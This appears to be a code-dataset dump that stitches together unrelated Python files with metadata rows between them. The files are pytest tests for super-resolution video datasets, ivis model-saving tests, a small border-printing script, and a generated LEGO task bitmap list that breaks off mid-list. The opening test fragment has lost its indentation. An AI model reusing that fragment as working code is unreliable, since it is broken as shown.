result = sr_landmark_dataset[0]
assert len(sr_landmark_dataset) == 1
assert assert_dict_has_keys(result, target_keys)
# input path is str
sr_landmark_dataset = SRFacialLandmarkDataset(
gt_folder=str(gt_folder),
ann_file=str(ann_file),
pipeline=sr_pipeline,
scale=4)
data_infos = sr_landmark_dataset.data_infos
assert len(data_infos) == 1
result = sr_landmark_dataset[0]
assert len(sr_landmark_dataset) == 1
assert assert_dict_has_keys(result, target_keys)
def test_sr_lmdb_dataset(self):
# setup
lq_lmdb_folder = self.data_prefix / 'lq.lmdb'
sr_pipeline = [
dict(
type='LoadImageFromFile',
io_backend='lmdb',
key='lq',
db_path=lq_lmdb_folder),
dict(
type='LoadImageFromFile',
io_backend='lmdb',
key='gt',
db_path=lq_lmdb_folder),
dict(type='ImageToTensor', keys=['lq', 'gt'])
]
target_keys = [
'lq_path', 'gt_path', 'scale', 'lq', 'lq_ori_shape', 'gt',
'gt_ori_shape'
]
# input path is Path object
sr_lmdb_dataset = SRLmdbDataset(
lq_folder=lq_lmdb_folder,
gt_folder=lq_lmdb_folder, # fake gt_folder
pipeline=sr_pipeline,
scale=1)
data_infos = sr_lmdb_dataset.data_infos
assert data_infos == [dict(lq_path='baboon', gt_path='baboon')]
result = sr_lmdb_dataset[0]
assert (len(sr_lmdb_dataset) == 1)
assert assert_dict_has_keys(result, target_keys)
# input path is str
sr_lmdb_dataset = SRLmdbDataset(
lq_folder=str(lq_lmdb_folder),
gt_folder=(lq_lmdb_folder), # fake gt_folder
pipeline=sr_pipeline,
scale=1)
data_infos = sr_lmdb_dataset.data_infos
assert data_infos == [dict(lq_path='baboon', gt_path='baboon')]
result = sr_lmdb_dataset[0]
assert (len(sr_lmdb_dataset) == 1)
assert assert_dict_has_keys(result, target_keys)
with pytest.raises(ValueError):
sr_lmdb_dataset = SRLmdbDataset(
lq_folder=self.data_prefix, # normal folder
gt_folder=lq_lmdb_folder, # fake gt_folder
pipeline=sr_pipeline,
scale=1)
with pytest.raises(ValueError):
sr_lmdb_dataset = SRLmdbDataset(
lq_folder=str(self.data_prefix), # normal folder
gt_folder=lq_lmdb_folder, # fake gt_folder
pipeline=sr_pipeline,
scale=1)
with pytest.raises(ValueError):
sr_lmdb_dataset = SRLmdbDataset(
lq_folder=lq_lmdb_folder,
gt_folder=self.data_prefix, # normal folder
pipeline=sr_pipeline,
scale=1)
with pytest.raises(ValueError):
sr_lmdb_dataset = SRLmdbDataset(
lq_folder=lq_lmdb_folder,
gt_folder=str(self.data_prefix), # normal folder
pipeline=sr_pipeline,
scale=1)
def test_reds_dataset():
    """Test SRREDSDataset annotation parsing for both val partitions.

    The annotation file is mocked, so no data on disk is needed; the keys
    '000', '001' and '250' are chosen to fall on different sides of the
    'official' and 'REDS4' train/val splits.
    """
    root_path = Path(__file__).parent.parent.parent / 'data'
    txt_content = ('000/00000001.png (720, 1280, 3)\n'
                   '001/00000001.png (720, 1280, 3)\n'
                   '250/00000001.png (720, 1280, 3)\n')
    mocked_open_function = mock_open(read_data=txt_content)

    with patch('builtins.open', mocked_open_function):
        # official val partition: '250' is a validation clip, so only
        # '000' and '001' remain for training
        reds_dataset = SRREDSDataset(
            lq_folder=root_path,
            gt_folder=root_path,
            ann_file='fake_ann_file',
            num_input_frames=5,
            pipeline=[],
            scale=4,
            val_partition='official',
            test_mode=False)
        assert reds_dataset.data_infos == [
            dict(
                lq_path=str(root_path),
                gt_path=str(root_path),
                key='000/00000001',
                max_frame_num=100,
                num_input_frames=5),
            dict(
                lq_path=str(root_path),
                gt_path=str(root_path),
                key='001/00000001',
                max_frame_num=100,
                num_input_frames=5)
        ]
        # REDS4 val partition: '000' is a validation clip here instead
        reds_dataset = SRREDSDataset(
            lq_folder=root_path,
            gt_folder=root_path,
            ann_file='fake_ann_file',
            num_input_frames=5,
            pipeline=[],
            scale=4,
            val_partition='REDS4',
            test_mode=False)
        assert reds_dataset.data_infos == [
            dict(
                lq_path=str(root_path),
                gt_path=str(root_path),
                key='001/00000001',
                max_frame_num=100,
                num_input_frames=5),
            dict(
                lq_path=str(root_path),
                gt_path=str(root_path),
                key='250/00000001',
                max_frame_num=100,
                num_input_frames=5)
        ]
        with pytest.raises(ValueError):
            # wrong val_partition
            reds_dataset = SRREDSDataset(
                lq_folder=root_path,
                gt_folder=root_path,
                ann_file='fake_ann_file',
                num_input_frames=5,
                pipeline=[],
                scale=4,
                val_partition='wrong_val_partition',
                test_mode=False)
        with pytest.raises(AssertionError):
            # num_input_frames should be an odd number; a valid
            # val_partition is used so the frame-count assertion is the
            # only thing that can fire (previously an invalid partition
            # was passed here as well, leaving the test ambiguous)
            reds_dataset = SRREDSDataset(
                lq_folder=root_path,
                gt_folder=root_path,
                ann_file='fake_ann_file',
                num_input_frames=6,
                pipeline=[],
                scale=4,
                val_partition='official',
                test_mode=False)
        # test mode
        # official val partition: only the validation clip '250' remains
        reds_dataset = SRREDSDataset(
            lq_folder=root_path,
            gt_folder=root_path,
            ann_file='fake_ann_file',
            num_input_frames=5,
            pipeline=[],
            scale=4,
            val_partition='official',
            test_mode=True)
        assert reds_dataset.data_infos == [
            dict(
                lq_path=str(root_path),
                gt_path=str(root_path),
                key='250/00000001',
                max_frame_num=100,
                num_input_frames=5)
        ]
        # REDS4 val partition: only the validation clip '000' remains
        reds_dataset = SRREDSDataset(
            lq_folder=root_path,
            gt_folder=root_path,
            ann_file='fake_ann_file',
            num_input_frames=5,
            pipeline=[],
            scale=4,
            val_partition='REDS4',
            test_mode=True)
        assert reds_dataset.data_infos == [
            dict(
                lq_path=str(root_path),
                gt_path=str(root_path),
                key='000/00000001',
                max_frame_num=100,
                num_input_frames=5)
        ]
def test_vimeo90k_dataset():
    """SRVimeo90KDataset should expand each annotation line into 7 lq frames
    and a single gt frame (im4)."""
    root_path = Path(__file__).parent.parent.parent / 'data'
    txt_content = ('00001/0266 (256, 448, 3)\n00002/0268 (256, 448, 3)\n')
    mocked_open_function = mock_open(read_data=txt_content)

    def frame_paths(clip, seq):
        # im1.png ... im7.png inside <root>/<clip>/<seq>
        return [str(root_path / clip / seq / f'im{i}.png') for i in range(1, 8)]

    expected_infos = [
        dict(
            lq_path=frame_paths('00001', '0266'),
            gt_path=[str(root_path / '00001' / '0266' / 'im4.png')],
            key='00001/0266'),
        dict(
            lq_path=frame_paths('00002', '0268'),
            gt_path=[str(root_path / '00002' / '0268' / 'im4.png')],
            key='00002/0268'),
    ]
    with patch('builtins.open', mocked_open_function):
        vimeo90k_dataset = SRVimeo90KDataset(
            lq_folder=root_path,
            gt_folder=root_path,
            ann_file='fake_ann_file',
            num_input_frames=7,
            pipeline=[],
            scale=4,
            test_mode=False)
        assert vimeo90k_dataset.data_infos == expected_infos
        with pytest.raises(AssertionError):
            # num_input_frames should be odd numbers
            vimeo90k_dataset = SRVimeo90KDataset(
                lq_folder=root_path,
                gt_folder=root_path,
                ann_file='fake_ann_file',
                num_input_frames=6,
                pipeline=[],
                scale=4,
                test_mode=False)
def test_vid4_dataset():
    """Test SRVid4Dataset annotation parsing and evaluate() averaging modes."""
    root_path = Path(__file__).parent.parent.parent / 'data'
    # two clips: 'calendar' with 1 frame, 'city' with 2 frames
    txt_content = ('calendar 1 (320,480,3)\ncity 2 (320,480,3)\n')
    mocked_open_function = mock_open(read_data=txt_content)
    with patch('builtins.open', mocked_open_function):
        vid4_dataset = SRVid4Dataset(
            lq_folder=root_path / 'lq',
            gt_folder=root_path / 'gt',
            ann_file='fake_ann_file',
            num_input_frames=5,
            pipeline=[],
            scale=4,
            test_mode=False,
            metric_average_mode='clip',
            filename_tmpl='{:08d}')
        # one entry per frame, keyed '<clip>/<frame index>'
        assert vid4_dataset.data_infos == [
            dict(
                lq_path=str(root_path / 'lq'),
                gt_path=str(root_path / 'gt'),
                key='calendar/00000000',
                num_input_frames=5,
                max_frame_num=1),
            dict(
                lq_path=str(root_path / 'lq'),
                gt_path=str(root_path / 'gt'),
                key='city/00000000',
                num_input_frames=5,
                max_frame_num=2),
            dict(
                lq_path=str(root_path / 'lq'),
                gt_path=str(root_path / 'gt'),
                key='city/00000001',
                num_input_frames=5,
                max_frame_num=2),
        ]
        # test evaluate function ('clip' mode)
        results = [{
            'eval_result': {
                'PSNR': 21,
                'SSIM': 0.75
            }
        }, {
            'eval_result': {
                'PSNR': 22,
                'SSIM': 0.8
            }
        }, {
            'eval_result': {
                'PSNR': 24,
                'SSIM': 0.9
            }
        }]
        eval_results = vid4_dataset.evaluate(results)
        # 'clip' mode averages within each clip first:
        # mean(21, mean(22, 24)) = 22 and mean(0.75, mean(0.8, 0.9)) = 0.8
        np.testing.assert_almost_equal(eval_results['PSNR'], 22)
        np.testing.assert_almost_equal(eval_results['SSIM'], 0.8)
        # test evaluate function ('all' mode)
        vid4_dataset = SRVid4Dataset(
            lq_folder=root_path / 'lq',
            gt_folder=root_path / 'gt',
            ann_file='fake_ann_file',
            num_input_frames=5,
            pipeline=[],
            scale=4,
            test_mode=False,
            metric_average_mode='all',
            filename_tmpl='{:08d}')
        eval_results = vid4_dataset.evaluate(results)
        # 'all' mode averages over all frames directly: mean(21, 22, 24)
        np.testing.assert_almost_equal(eval_results['PSNR'], 22.3333333)
        np.testing.assert_almost_equal(eval_results['SSIM'], 0.81666666)
        with pytest.raises(AssertionError):
            # num_input_frames should be odd numbers
            SRVid4Dataset(
                lq_folder=root_path,
                gt_folder=root_path,
                ann_file='fake_ann_file',
                num_input_frames=6,
                pipeline=[],
                scale=4,
                test_mode=False)
        with pytest.raises(ValueError):
            # metric_average_mode must be a supported mode
            # ('clip' and 'all' are exercised above; 'abc' is invalid)
            SRVid4Dataset(
                lq_folder=root_path,
                gt_folder=root_path,
                ann_file='fake_ann_file',
                num_input_frames=5,
                pipeline=[],
                scale=4,
                metric_average_mode='abc',
                test_mode=False)
        with pytest.raises(TypeError):
            # results must be a list
            vid4_dataset.evaluate(results=5)
        with pytest.raises(AssertionError):
            # The length of results should be equal to the dataset len
            vid4_dataset.evaluate(results=[results[0]])
def test_sr_reds_multiple_gt_dataset():
    """Test SRREDSMultipleGTDataset clip listing for both val partitions."""
    root_path = Path(__file__).parent.parent.parent / 'data'

    # official val partition
    reds_dataset = SRREDSMultipleGTDataset(
        lq_folder=root_path,
        gt_folder=root_path,
        num_input_frames=15,
        pipeline=[],
        scale=4,
        val_partition='official',
        test_mode=False)
    assert len(reds_dataset.data_infos) == 240  # 240 training clips
    assert reds_dataset.data_infos[0] == dict(
        lq_path=str(root_path),
        gt_path=str(root_path),
        key='000',
        sequence_length=100,
        num_input_frames=15)
    # REDS4 val partition
    reds_dataset = SRREDSMultipleGTDataset(
        lq_folder=root_path,
        gt_folder=root_path,
        num_input_frames=20,
        pipeline=[],
        scale=4,
        val_partition='REDS4',
        test_mode=False)
    assert len(reds_dataset.data_infos) == 266  # 266 training clips
    assert reds_dataset.data_infos[0] == dict(
        lq_path=str(root_path),
        gt_path=str(root_path),
        key='001',
        sequence_length=100,
        num_input_frames=20)  # clip '000' belongs to the REDS4 val split
    with pytest.raises(ValueError):
        # wrong val_partition
        reds_dataset = SRREDSMultipleGTDataset(
            lq_folder=root_path,
            gt_folder=root_path,
            num_input_frames=5,
            pipeline=[],
            scale=4,
            val_partition='wrong_val_partition',
            test_mode=False)
    # test mode
    # official val partition
    reds_dataset = SRREDSMultipleGTDataset(
        lq_folder=root_path,
        gt_folder=root_path,
        num_input_frames=5,
        pipeline=[],
        scale=4,
        val_partition='official',
        test_mode=True)
    assert len(reds_dataset.data_infos) == 30  # 30 test clips
    assert reds_dataset.data_infos[0] == dict(
        lq_path=str(root_path),
        gt_path=str(root_path),
        key='240',
        sequence_length=100,
        num_input_frames=5)
    # REDS4 val partition
    reds_dataset = SRREDSMultipleGTDataset(
        lq_folder=root_path,
        gt_folder=root_path,
        num_input_frames=5,
        pipeline=[],
        scale=4,
        val_partition='REDS4',
        test_mode=True)
    assert len(reds_dataset.data_infos) == 4  # 4 test clips
    assert reds_dataset.data_infos[1] == dict(
        lq_path=str(root_path),
        gt_path=str(root_path),
        key='011',
        sequence_length=100,
        num_input_frames=5)
def test_sr_vimeo90k_mutiple_gt_dataset():
    """SRVimeo90KMultipleGTDataset should list all 7 frames as both lq and gt."""
    root_path = Path(__file__).parent.parent.parent / 'data/vimeo90k'
    mocked_open_function = mock_open(read_data='00001/0266 (256,448,3)\n')
    # lq and gt cover the same seven frames im1.png ... im7.png
    frame_paths = [
        str(root_path / '00001' / '0266' / f'im{idx}.png')
        for idx in range(1, 8)
    ]
    with patch('builtins.open', mocked_open_function):
        vimeo90k_dataset = SRVimeo90KMultipleGTDataset(
            lq_folder=root_path,
            gt_folder=root_path,
            ann_file='fake_ann_file',
            pipeline=[],
            scale=4,
            test_mode=False)
        assert vimeo90k_dataset.data_infos == [
            dict(lq_path=frame_paths, gt_path=frame_paths, key='00001/0266')
        ]
def test_sr_test_multiple_gt_dataset():
    """SRTestMultipleGTDataset should discover each sequence and its length."""
    root_path = Path(__file__).parent.parent.parent / 'data/test_multiple_gt'
    test_dataset = SRTestMultipleGTDataset(
        lq_folder=root_path,
        gt_folder=root_path,
        pipeline=[],
        scale=4,
        test_mode=True)
    # sequence_1 holds 2 frames, sequence_2 holds 1 frame
    expected_infos = [
        dict(
            lq_path=str(root_path),
            gt_path=str(root_path),
            key=f'sequence_{idx}',
            sequence_length=length) for idx, length in ((1, 2), (2, 1))
    ]
    assert test_dataset.data_infos == expected_infos
def test_sr_folder_multiple_gt_dataset():
    """Test SRFolderMultipleGTDataset with and without num_input_frames."""
    root_path = Path(__file__).parent.parent.parent / 'data/test_multiple_gt'

    # test without num_input_frames: it defaults to each sequence's length
    test_dataset = SRFolderMultipleGTDataset(
        lq_folder=root_path,
        gt_folder=root_path,
        pipeline=[],
        scale=4,
        test_mode=True)
    assert test_dataset.data_infos == [
        dict(
            lq_path=str(root_path),
            gt_path=str(root_path),
            key='sequence_1',
            num_input_frames=2,
            sequence_length=2),
        dict(
            lq_path=str(root_path),
            gt_path=str(root_path),
            key='sequence_2',
            num_input_frames=1,
            sequence_length=1)
    ]

    # test with num_input_frames: the explicit value applies to every sequence
    test_dataset = SRFolderMultipleGTDataset(
        lq_folder=root_path,
        gt_folder=root_path,
        pipeline=[],
        scale=4,
        num_input_frames=1,
        test_mode=True)
    assert test_dataset.data_infos == [
        dict(
            lq_path=str(root_path),
            gt_path=str(root_path),
            key='sequence_1',
            num_input_frames=1,
            sequence_length=2),
        dict(
            lq_path=str(root_path),
            gt_path=str(root_path),
            key='sequence_2',
            num_input_frames=1,
            sequence_length=1)
    ]

    # num_input_frames must be a positive integer
    with pytest.raises(ValueError):
        SRFolderMultipleGTDataset(
            lq_folder=root_path,
            gt_folder=root_path,
            pipeline=[],
            scale=4,
            num_input_frames=-1,
            test_mode=True)
def test_sr_folder_video_dataset():
    """Test SRFolderVideoDataset frame listing and evaluate() averaging modes."""
    root_path = Path(__file__).parent.parent.parent / 'data/test_multiple_gt'

    test_dataset = SRFolderVideoDataset(
        lq_folder=root_path,
        gt_folder=root_path,
        num_input_frames=5,
        pipeline=[],
        scale=4,
        test_mode=True)
    # one entry per frame, keyed '<sequence>/<frame index>'
    assert test_dataset.data_infos == [
        dict(
            lq_path=str(root_path),
            gt_path=str(root_path),
            key='sequence_1/00000000',
            num_input_frames=5,
            max_frame_num=2),
        dict(
            lq_path=str(root_path),
            gt_path=str(root_path),
            key='sequence_1/00000001',
            num_input_frames=5,
            max_frame_num=2),
        dict(
            lq_path=str(root_path),
            gt_path=str(root_path),
            key='sequence_2/00000000',
            num_input_frames=5,
            max_frame_num=1),
    ]

    # test evaluate function ('clip' mode)
    test_dataset = SRFolderVideoDataset(
        lq_folder=root_path,
        gt_folder=root_path,
        num_input_frames=5,
        pipeline=[],
        scale=4,
        metric_average_mode='clip',
        test_mode=True)
    results = [{
        'eval_result': {
            'PSNR': 21,
            'SSIM': 0.75
        }
    }, {
        'eval_result': {
            'PSNR': 23,
            'SSIM': 0.85
        }
    }, {
        'eval_result': {
            'PSNR': 24,
            'SSIM': 0.9
        }
    }]
    eval_results = test_dataset.evaluate(results)
    # 'clip' mode averages within each sequence first:
    # mean(mean(21, 23), 24) = 23 and mean(mean(0.75, 0.85), 0.9) = 0.85
    np.testing.assert_almost_equal(eval_results['PSNR'], 23)
    np.testing.assert_almost_equal(eval_results['SSIM'], 0.85)

    # test evaluate function ('all' mode)
    test_dataset = SRFolderVideoDataset(
        lq_folder=root_path,
        gt_folder=root_path,
        num_input_frames=5,
        pipeline=[],
        scale=4,
        metric_average_mode='all',
        test_mode=True)
    eval_results = test_dataset.evaluate(results)
    # 'all' mode averages over all frames directly: mean(21, 23, 24)
    np.testing.assert_almost_equal(eval_results['PSNR'], 22.6666666)
    np.testing.assert_almost_equal(eval_results['SSIM'], 0.83333333)

    # num_input_frames should be odd numbers
    with pytest.raises(AssertionError):
        SRFolderVideoDataset(
            lq_folder=root_path,
            gt_folder=root_path,
            num_input_frames=6,
            pipeline=[],
            scale=4,
            test_mode=True)
    # metric_average_mode must be a supported mode
    # ('clip' and 'all' are exercised above; 'abc' is invalid)
    with pytest.raises(ValueError):
        SRFolderVideoDataset(
            lq_folder=root_path,
            gt_folder=root_path,
            num_input_frames=5,
            pipeline=[],
            scale=4,
            metric_average_mode='abc',
            test_mode=False)
    # results must be a list
    with pytest.raises(TypeError):
        test_dataset.evaluate(results=5)
    # The length of results should be equal to the dataset len
    with pytest.raises(AssertionError):
        test_dataset.evaluate(results=[results[0]])
| 33.768463
| 79
| 0.560586
| 3,816
| 33,836
| 4.636006
| 0.069182
| 0.050647
| 0.042734
| 0.037307
| 0.870103
| 0.850885
| 0.822
| 0.794867
| 0.788254
| 0.747386
| 0
| 0.03254
| 0.34153
| 33,836
| 1,001
| 80
| 33.802198
| 0.76149
| 0.053907
| 0
| 0.773585
| 0
| 0.001179
| 0.069484
| 0.001974
| 0
| 0
| 0
| 0
| 0.09434
| 1
| 0.023585
| false
| 0.001179
| 0.008255
| 0.001179
| 0.036557
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c3ebe34f00bbc16f79a927655a40182b6c48d3b
| 5,196
|
py
|
Python
|
tests/test_model_saving.py
|
escherba/ivis
|
bb80e00e6381d9de13fab9950d91428f4be56a58
|
[
"Apache-2.0"
] | 1
|
2021-04-21T05:31:26.000Z
|
2021-04-21T05:31:26.000Z
|
tests/test_model_saving.py
|
spiderrobot/ivis
|
bbfd8381c0f40f7219585df851ed9a2f4278bee4
|
[
"Apache-2.0"
] | null | null | null |
tests/test_model_saving.py
|
spiderrobot/ivis
|
bbfd8381c0f40f7219585df851ed9a2f4278bee4
|
[
"Apache-2.0"
] | null | null | null |
import os
import tempfile
import pytest
from sklearn import datasets
import numpy as np
import tensorflow as tf
from ivis import Ivis
@pytest.fixture(scope='function')
def model_filepath():
    """Yield a model path inside a temp directory that is removed afterwards."""
    with tempfile.TemporaryDirectory() as temp_dir:
        yield os.path.join(temp_dir, 'test.ivis.model.saving.ivis')
def test_ivis_model_saving(model_filepath):
    """Saving then loading an Ivis model must round-trip predictions,
    serializable state, layer weights and optimizer weights."""
    model = Ivis(k=15, batch_size=16, epochs=5)
    iris = datasets.load_iris()
    X = iris.data
    model.fit(X)

    model.save_model(model_filepath, overwrite=True)
    model_2 = Ivis()
    model_2.load_model(model_filepath)

    # Check that model predictions are same
    assert np.all(model.transform(X) == model_2.transform(X))
    # Serializable dict elements are the same
    assert model.__getstate__() == model_2.__getstate__()

    # Check all weights are the same (and that each layer has the same
    # number of weight tensors, which the old index loop assumed silently)
    for model_layer, model_2_layer in zip(model.encoder.layers,
                                          model_2.encoder.layers):
        model_layer_weights = model_layer.get_weights()
        model_2_layer_weights = model_2_layer.get_weights()
        assert len(model_layer_weights) == len(model_2_layer_weights)
        for w1, w2 in zip(model_layer_weights, model_2_layer_weights):
            assert np.all(w1 == w2)

    # Check optimizer weights are the same
    for w1, w2 in zip(model.model_.optimizer.get_weights(),
                      model_2.model_.optimizer.get_weights()):
        assert np.all(w1 == w2)

    # Check that trying to save over an existing folder raises an Exception
    # (pytest.raises already guarantees the exception type, so the old
    # redundant isinstance check is gone)
    with pytest.raises(FileExistsError):
        model.save_model(model_filepath)

    # Check that can overwrite existing model if requested
    model.save_model(model_filepath, overwrite=True)

    # The loaded model can be trained further (result intentionally unused)
    model_2.fit_transform(X)
def test_supervised_model_saving(model_filepath):
    """A supervised Ivis model must round-trip embeddings, supervised
    predictions, serializable state and all weights."""
    model = Ivis(k=15, batch_size=16, epochs=5,
                 supervision_metric='sparse_categorical_crossentropy')
    iris = datasets.load_iris()
    X = iris.data
    Y = iris.target
    model.fit(X, Y)

    model.save_model(model_filepath, overwrite=True)
    model_2 = Ivis()
    model_2.load_model(model_filepath)

    # Check that model embeddings are same
    assert np.all(model.transform(X) == model_2.transform(X))
    # Check that model supervised predictions are same
    assert np.all(model.score_samples(X) == model_2.score_samples(X))
    # Serializable dict elements are the same
    assert model.__getstate__() == model_2.__getstate__()

    # Check all weights are the same (and that each layer has the same
    # number of weight tensors, which the old index loop assumed silently)
    for model_layer, model_2_layer in zip(model.encoder.layers,
                                          model_2.encoder.layers):
        model_layer_weights = model_layer.get_weights()
        model_2_layer_weights = model_2_layer.get_weights()
        assert len(model_layer_weights) == len(model_2_layer_weights)
        for w1, w2 in zip(model_layer_weights, model_2_layer_weights):
            assert np.all(w1 == w2)

    # Check optimizer weights are the same
    for w1, w2 in zip(model.model_.optimizer.get_weights(),
                      model_2.model_.optimizer.get_weights()):
        assert np.all(w1 == w2)

    # Check that trying to save over an existing folder raises an Exception
    # (pytest.raises already guarantees the exception type)
    with pytest.raises(FileExistsError):
        model.save_model(model_filepath)

    # Check that can overwrite existing model if requested
    model.save_model(model_filepath, overwrite=True)

    # The loaded model can be trained further (result intentionally unused)
    model_2.fit_transform(X, Y)
def test_custom_model_saving(model_filepath):
    """An Ivis model built on a custom Keras encoder must round-trip
    embeddings, supervised predictions, state and all weights."""
    iris = datasets.load_iris()
    X = iris.data
    Y = iris.target

    # Create a custom model
    inputs = tf.keras.layers.Input(shape=(X.shape[-1],))
    x = tf.keras.layers.Dense(128, activation='relu')(inputs)
    custom_model = tf.keras.Model(inputs, x)

    model = Ivis(k=15, batch_size=16, epochs=5,
                 supervision_metric='sparse_categorical_crossentropy',
                 model=custom_model)
    model.fit(X, Y)

    model.save_model(model_filepath, overwrite=True)
    model_2 = Ivis()
    model_2.load_model(model_filepath)

    # Check that model embeddings are same
    assert np.all(model.transform(X) == model_2.transform(X))
    # Check that model supervised predictions are same
    assert np.all(model.score_samples(X) == model_2.score_samples(X))
    # Serializable dict elements are the same
    assert model.__getstate__() == model_2.__getstate__()

    # Check all weights are the same (and that each layer has the same
    # number of weight tensors, which the old index loop assumed silently)
    for model_layer, model_2_layer in zip(model.encoder.layers,
                                          model_2.encoder.layers):
        model_layer_weights = model_layer.get_weights()
        model_2_layer_weights = model_2_layer.get_weights()
        assert len(model_layer_weights) == len(model_2_layer_weights)
        for w1, w2 in zip(model_layer_weights, model_2_layer_weights):
            assert np.all(w1 == w2)

    # Check optimizer weights are the same
    for w1, w2 in zip(model.model_.optimizer.get_weights(),
                      model_2.model_.optimizer.get_weights()):
        assert np.all(w1 == w2)

    # The loaded model can be trained further (result intentionally unused)
    model_2.fit_transform(X, Y)
| 36.591549
| 78
| 0.686297
| 719
| 5,196
| 4.699583
| 0.155772
| 0.062149
| 0.039065
| 0.037881
| 0.857946
| 0.857946
| 0.857946
| 0.846108
| 0.846108
| 0.846108
| 0
| 0.017109
| 0.223826
| 5,196
| 142
| 79
| 36.591549
| 0.820729
| 0.156467
| 0
| 0.733333
| 0
| 0
| 0.02316
| 0.020408
| 0
| 0
| 0
| 0
| 0.177778
| 1
| 0.044444
| false
| 0
| 0.077778
| 0
| 0.122222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c791deea1e1a0eee7e1fd63513908be1b4961c7
| 84
|
py
|
Python
|
PCTC/Warm Up/Q2.py
|
object-oriented-human/competitive
|
9e761020e887d8980a39a64eeaeaa39af0ecd777
|
[
"MIT"
] | 1
|
2022-02-21T15:43:01.000Z
|
2022-02-21T15:43:01.000Z
|
PCTC/Warm Up/Q2.py
|
foooop/competitive
|
9e761020e887d8980a39a64eeaeaa39af0ecd777
|
[
"MIT"
] | null | null | null |
PCTC/Warm Up/Q2.py
|
foooop/competitive
|
9e761020e887d8980a39a64eeaeaa39af0ecd777
|
[
"MIT"
] | null | null | null |
# Read a word and a single border character, then print the word framed
# by that character on all sides.
age, c = input(), input()
border = c * (len(age) + 2)
print(border)
print(c + age + c)
print(border)
| 21
| 25
| 0.595238
| 18
| 84
| 2.777778
| 0.333333
| 0.36
| 0.36
| 0.48
| 0.52
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025974
| 0.083333
| 84
| 4
| 26
| 21
| 0.623377
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.75
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
7cd42ca40c2e2697a240bbef50b15f3441873170
| 6,569
|
py
|
Python
|
gabriel_lego/lego_engine/tasks/task_generated_90.py
|
molguin92/gabriel-lego-py3
|
2f8828326ca025997687a19d1af80bc1590a9290
|
[
"Apache-2.0"
] | null | null | null |
gabriel_lego/lego_engine/tasks/task_generated_90.py
|
molguin92/gabriel-lego-py3
|
2f8828326ca025997687a19d1af80bc1590a9290
|
[
"Apache-2.0"
] | 1
|
2019-09-10T23:41:41.000Z
|
2019-09-11T20:21:11.000Z
|
gabriel_lego/lego_engine/tasks/task_generated_90.py
|
molguin92/gabriel-lego-py3
|
2f8828326ca025997687a19d1af80bc1590a9290
|
[
"Apache-2.0"
] | 1
|
2022-02-22T15:29:27.000Z
|
2022-02-22T15:29:27.000Z
|
from numpy import array

# Automatically generated task with 90 steps.
# Each entry in `bitmaps` is one step of the board state: a 2-D array with one
# integer colour label per position, bottom rows listed last.
# Labels: nothing:0, white:1, green:2, yellow:3, red:4, blue:5, black:6,
# unsure:7
# NOTE: generated data — do not edit the arrays by hand.
bitmaps = \
    [array([[4, 4, 4, 4, 4, 4]]),
     array([[0, 0, 0, 0, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 0, 5, 0, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[4, 0, 5, 0, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[4, 0, 5, 5, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[4, 4, 5, 5, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[4, 0, 5, 5, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[4, 0, 5, 0, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 0, 5, 0, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 0, 0, 0, 2, 2],
            [4, 4, 4, 4, 4, 4]]),
     array([[4, 4, 4, 4, 4, 4]]),
     array([[0, 0, 3, 3, 0, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 0, 3, 3, 0, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 3, 3, 3, 0, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 3, 3, 3, 4, 0],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 4, 4, 0, 0, 0],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 4, 4, 0, 0, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[0, 4, 4, 0, 5, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[4, 4, 4, 0, 5, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[4, 4, 4, 2, 5, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 0, 0, 0, 0, 0],
            [4, 4, 4, 2, 5, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 5, 0, 0, 0, 0],
            [4, 4, 4, 2, 5, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 5, 0, 0, 0, 5],
            [4, 4, 4, 2, 5, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
     array([[3, 5, 3, 0, 0, 5],
            [4, 4, 4, 2, 5, 2],
            [3, 3, 3, 3, 4, 4],
            [4, 4, 4, 4, 4, 4]]),
